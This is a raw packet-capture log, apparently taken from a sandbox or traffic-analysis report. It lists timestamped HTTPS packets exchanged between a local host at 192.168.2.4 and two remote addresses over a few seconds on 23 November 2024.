                                                                                                                                                                                                Nov 23, 2024 16:54:47.896243095 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.896284103 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.896300077 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.896317005 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.896323919 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.898722887 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.898793936 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.898874998 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.899020910 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.899036884 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:48.063075066 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:48.066260099 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:48.066365004 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:48.066457033 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:48.066472054 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:48.066495895 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:48.066500902 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:48.073410988 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:48.073466063 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:48.073529959 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:48.073718071 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:48.073736906 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.201302052 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.202054024 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.202145100 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.202572107 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.202586889 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.534240961 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.534794092 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.534857035 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.535115957 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.535130024 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.538482904 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.538855076 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.538909912 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.539236069 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.539249897 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.642543077 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.646322966 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.646512032 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.646557093 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.646557093 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.646576881 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.646594048 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.650595903 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.650643110 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.650703907 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.650831938 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.650840998 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.688271999 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.688743114 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.688802004 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.688987970 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.688999891 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.866406918 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.888051987 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.888079882 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:49.891447067 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:49.891453981 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.034184933 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.036715031 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.036777020 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.036848068 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037024021 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037024021 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037050962 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037067890 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037105083 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037138939 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037164927 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037225962 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037441969 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037441969 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037484884 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.037527084 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.039709091 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.039731979 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.039788008 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.039849997 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.039894104 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.039962053 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.040004969 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.040016890 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.040081978 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.040097952 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.198137045 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.198210955 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.198282003 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.198577881 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.198577881 CET49959443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.198616982 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.198642969 CET4434995913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.201559067 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.201628923 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.201710939 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.201822042 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.201873064 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.309855938 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.313035965 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.313091040 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.313122034 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.313136101 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.313146114 CET49960443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.313152075 CET4434996013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.315362930 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.315397978 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:50.315460920 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.315577984 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:50.315594912 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:51.442837000 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:51.443613052 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:51.443645954 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:51.443970919 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:51.443977118 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.579844952 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.585277081 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.585331917 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.585383892 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.585385084 CET49961443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.585405111 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.585417986 CET4434996113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.589850903 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.589936972 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.590049028 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.590285063 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.590320110 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.672601938 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.672785044 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.673252106 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.673269987 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.673331976 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.673361063 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.673799992 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.673804998 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.673954964 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.673959970 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.781910896 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.782366037 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.782454014 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.782522917 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.782756090 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.782783031 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.782799959 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.782800913 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:52.783102036 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:52.783109903 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.153991938 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.157475948 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.157521963 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.157546043 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.157563925 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.157623053 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.157661915 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.157684088 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.157691956 CET49962443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.157696962 CET4434996213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.160598040 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.160689116 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.160779953 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.160891056 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.160911083 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.165556908 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.165749073 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.165807009 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.165846109 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.165863991 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.165874958 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.165879011 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.167789936 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.167810917 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.167881966 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.167973042 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.167979956 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.229286909 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.229387045 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.229474068 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.229760885 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.229760885 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.229792118 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.229815006 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.231441021 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.231512070 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.231574059 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.231646061 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.231686115 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.231715918 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.231731892 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.232851982 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.232887983 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.232975960 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.233103991 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.233108997 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.233638048 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.233659029 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:53.233720064 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.233865976 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:53.233870983 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:54.194015980 CET44349945142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:54.194175959 CET44349945142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:54.194370031 CET49945443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:54:54.530035019 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:54.530728102 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:54.530771971 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:54.531332970 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:54.531339884 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:54.941251993 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:54.987742901 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:54.987763882 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:54.987809896 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:54.987951040 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:54.987951994 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:54.990179062 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:54.998976946 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.033571959 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.033591032 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.034012079 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.034017086 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.034523964 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.034524918 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.034569979 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.034599066 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.035758018 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.035837889 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.036128044 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.036143064 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.038980961 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.039025068 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.039088011 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.039351940 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.039366007 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.064989090 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.066581011 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.066596985 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.069806099 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.069809914 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.158303976 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.158667088 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.158693075 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.159075975 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.159081936 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.304716110 CET49945443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:54:55.304790020 CET44349945142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.383413076 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.386615038 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.386668921 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.386799097 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.386816978 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.386828899 CET49968443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.386833906 CET4434996813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.389691114 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.389786005 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.389863968 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.390055895 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.390104055 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.509480953 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.512613058 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.512686014 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.512765884 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.512765884 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.512813091 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.512836933 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.513777018 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.514933109 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.515029907 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.515130043 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.515286922 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.515332937 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.516900063 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.516947031 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.516952991 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.516997099 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.517036915 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.517052889 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.517061949 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.517066956 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.519040108 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.519085884 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.519171000 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.519296885 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.519341946 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.613174915 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.613341093 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.613533974 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.613575935 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.613575935 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.613595009 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.613605976 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.616620064 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.616683960 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:55.616806984 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:55.616950035 CET49975443192.168.2.413.107.246.63
